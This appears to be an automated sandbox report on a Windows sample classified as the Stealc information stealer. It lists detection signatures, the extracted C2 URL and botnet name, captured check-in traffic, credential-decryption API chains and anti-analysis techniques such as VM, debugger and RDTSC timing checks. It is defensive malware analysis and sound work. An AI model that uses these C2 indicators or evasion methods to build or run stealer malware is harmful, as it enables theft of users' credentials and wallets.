Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542970
MD5: a2d11b8a418d4d4f4653ffd4af70d5c7
SHA1: f3067cf41aa873f0a0b363641f7be52f3497ab4b
SHA256: de03784bad73bf146aef041c6d82e2f0e519688bcc6230f4cf88272b24b2a328
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A2D11B8A418D4D4F4653FFD4AF70D5C7)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1723267854.0000000004B50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7284 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7284 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.520000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T01:47:07.638757+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.520000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00527240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00529AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00529B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00538EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00534910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00534570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00533EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
  Host: 185.215.113.206
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 37 39 33 33 44 45 31 46 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a
  Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"9A7933DE1F39786254513------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"puma------EBKKKEGIDBGHIDGDHDBF--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00524880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF
  Host: 185.215.113.206
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 37 39 33 33 44 45 31 46 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a
  Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"9A7933DE1F39786254513------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"puma------EBKKKEGIDBGHIDGDHDBF--
Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/4
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php9
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.1768903421.0000000000F56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.1768903421.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206Y

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BC0B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EB9F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E513D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F4206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F6A3C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E6B3E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00842363
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00845C0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E6D0B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E85F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B9D55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009686DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F267F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F1724
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005245C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: pbupcvvt ZLIB complexity 0.9950165471464949
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00533720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3TRCETLZ.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1865728 > 1048576
Source: file.exe | Static PE information: Raw size of pbupcvvt is bigger than: 0x100000 < 0x1a1400

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.520000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pbupcvvt:EW;eseqydfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pbupcvvt:EW;eseqydfj:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ca9ee should be: 0x1cd4a4
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: pbupcvvt
Source: file.exe | Static PE information: section name: eseqydfj
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009858B0 push edi; mov dword ptr [esp], ecx | 0_2_009858CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009858B0 push ecx; mov dword ptr [esp], edi | 0_2_0098592E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009858B0 push ebp; mov dword ptr [esp], esi | 0_2_0098593A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091E0A6 push 5FC68DABh; mov dword ptr [esp], edi | 0_2_0091E0E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A90A3 push eax; mov dword ptr [esp], ebp | 0_2_009A950C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A90A3 push ebp; mov dword ptr [esp], edx | 0_2_009A9AE5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099E8D1 push 09B3E6CEh; mov dword ptr [esp], esi | 0_2_0099E8D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B00CD push edx; mov dword ptr [esp], ebx | 0_2_009B0910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B00CD push ecx; mov dword ptr [esp], eax | 0_2_009B0914
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053B035 push ecx; ret | 0_2_0053B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE829 push 34C7C552h; mov dword ptr [esp], eax | 0_2_009DE7A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE829 push ebx; mov dword ptr [esp], 575251B9h | 0_2_009DE85F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE829 push 6DBA7187h; mov dword ptr [esp], esi | 0_2_009DE879
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00926029 push 37E85360h; mov dword ptr [esp], ebx | 0_2_009262C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BC0B9 push 354B4A22h; mov dword ptr [esp], ecx | 0_2_007BC147
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BC0B9 push 1C5DD1B1h; mov dword ptr [esp], edi | 0_2_007BC18C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC5062 push edi; mov dword ptr [esp], ecx | 0_2_00BC50B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC5062 push edi; mov dword ptr [esp], 57CFC0D1h | 0_2_00BC5114
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC5062 push 1EC13951h; mov dword ptr [esp], ebx | 0_2_00BC513F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push eax; mov dword ptr [esp], 7FFF0864h | 0_2_0099B098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push 68B46C00h; mov dword ptr [esp], ebp | 0_2_0099B0A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push eax; mov dword ptr [esp], edi | 0_2_0099B0B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push edx; mov dword ptr [esp], edi | 0_2_0099B12C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push edi; mov dword ptr [esp], ebx | 0_2_0099B150
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push 45720ABBh; mov dword ptr [esp], ecx | 0_2_0099B1D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push eax; mov dword ptr [esp], ebx | 0_2_0099B1ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push edx; mov dword ptr [esp], ebp | 0_2_0099B1F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B078 push edx; mov dword ptr [esp], 3B8F65B0h | 0_2_0099B1F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AF879 push 4E344040h; mov dword ptr [esp], ecx | 0_2_009AF8F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FA06A push 79803901h; mov dword ptr [esp], ebp | 0_2_008FA0F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FA06A push eax; mov dword ptr [esp], ecx | 0_2_008FA135
Source: file.exe | Static PE information: section name: pbupcvvt entropy: 7.9539107062128656

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13222
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 782358 second address: 78235C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78235C second address: 782360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 782360 second address: 782366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F9EC4 second address: 8F9ECC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F9ECC second address: 8F9EE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F228D5156D3h 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FA43A second address: 8FA452 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F228CBCA0B3h 0x00000008 jmp 00007F228CBCA0ADh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FA729 second address: 8FA72F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FA72F second address: 8FA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FA738 second address: 8FA740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDACF second address: 8FDAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDB21 second address: 8FDB2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDB2A second address: 8FDB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDB30 second address: 8FDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F228D5156C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDB40 second address: 8FDB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDB44 second address: 8FDBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 xor cl, 00000063h 0x0000000b cmc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D27BEh], ebx 0x00000014 push 891EC4A6h 0x00000019 jnp 00007F228D5156D8h 0x0000001f add dword ptr [esp], 76E13BDAh 0x00000026 or ecx, 7776FB15h 0x0000002c push 00000003h 0x0000002e jbe 00007F228D5156C9h 0x00000034 movsx edi, cx 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122D18EEh], eax 0x0000003f mov di, si 0x00000042 push 00000003h 0x00000044 and edx, dword ptr [ebp+122D2B70h] 0x0000004a call 00007F228D5156C9h 0x0000004f jmp 00007F228D5156CDh 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 pushad 0x00000058 popad 0x00000059 pop eax 0x0000005a pop edx 0x0000005b mov eax, dword ptr [esp+04h] 0x0000005f pushad 0x00000060 jmp 00007F228D5156CBh 0x00000065 push eax 0x00000066 push edx 0x00000067 pop edx 0x00000068 pop eax 0x00000069 popad 0x0000006a mov eax, dword ptr [eax] 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDBD9 second address: 8FDBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDBDD second address: 8FDBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
